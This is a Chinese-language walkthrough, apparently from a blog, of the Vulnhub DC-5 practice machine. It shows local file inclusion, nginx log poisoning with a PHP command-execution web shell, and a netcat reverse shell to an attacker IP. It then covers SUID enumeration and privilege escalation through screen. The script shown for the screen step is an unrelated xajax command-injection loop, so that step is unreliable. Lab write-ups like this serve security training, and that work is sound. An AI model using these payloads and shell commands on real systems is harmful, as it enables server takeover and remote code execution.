首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >【Vulnhub】DC-5

【Vulnhub】DC-5

作者头像
yichen
发布2020-05-04 15:11:16
3330
发布2020-05-04 15:11:16
举报

使用 nmap 扫描端口

在 contact 填写完以后,返回一个 thankyou.php 有文件包含漏洞

!?怎么找到的??

大佬们通过扫目录,扫出来的结果去看了一下(字典实在是太大,我就不扫了,白费劲)

发现 footer.php 这个页面每次加载都是不一样的

然后在 thankyou.php 也有这样的情况,所以有理由怀疑是 thankyou.php 包含了这个文件

同时 fuzz 试出来一个 file 参数

mark 一下,收集一些字典整理一下,好久之前就应该做这个事情了

在扫描端口阶段注意到这是个 nginx 的服务,通过包含日志文件来 getshell

带着这个访问:

<?php passthru($_GET['yichen']); ?>

然后如包含日志文件 /var/log/nginx/access.log,同时可以跟上命令了

那既然这样,就 nc 反弹一个 shell 把,在 kali 上监听一个 6666 端口

nc -lvp 6666

浏览器访问一下就连上了

192.168.149.163/thankyou.php?file=/var/log/nginx/access.log&yichen=nc 192.168.149.141 6666 -c /bin/bash

提权

suid 提权:

find / -user root -perm -4000 -print 2>/dev/null

先看一下有没有能用的

搜一下 searchsploit screen

分别把两个 C 语言文件拷出来,按照 sh 脚本的命令编译好了(然后把前面的去掉就可以了)然后用 vi 打开该 sh 文件,使用 :set ff=unix,然后保存

#!/bin/shecho $0;URL="${1}"while true;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping" "${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1done

然后再通过 nc 传过去

执行脚本提权

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-04-28,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 陈冠男的游戏人生 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档